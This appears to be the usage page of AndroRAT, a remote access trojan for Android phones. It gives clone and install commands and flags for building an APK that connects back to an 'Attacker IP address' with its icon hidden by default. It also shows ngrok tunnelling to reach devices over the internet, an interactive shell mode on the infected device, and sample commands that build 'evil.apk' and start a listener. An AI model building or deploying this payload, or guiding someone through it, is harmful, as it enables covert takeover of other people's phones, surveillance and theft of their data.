AndroRAT
Installation :
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txtAvailable Modes
--build- for building the android apk--ngrok- for using ngrok tunnel (over the internet)--shell- getting an interactive shell of the device
Build Mode :
Usage:
python3 androRAT.py --build --ngrok [flags]
Flags:
-p, --port Attacker port number (optional by default its set to 8000)
-o, --output Name for the apk file (optional by default its set to "karma.apk")
-icon, --icon Visible icon after installing apk (by default set to hidden)Usage:
python3 androRAT.py --build [flags]
Flags:
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
-icon, --icon Visible icon after installing apk (by default set to hidden)Shell Mode :
Commands Available
Usage :
To build the apk using ngrok which will also set the listner:
python3 androRAT.py --build --ngrok -o evil.apkTo build the apk using desired ip and port:
python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apkTo get the interpreter:
python3 androRAT.py --shell -i 0.0.0.0 -p 8000


Last updated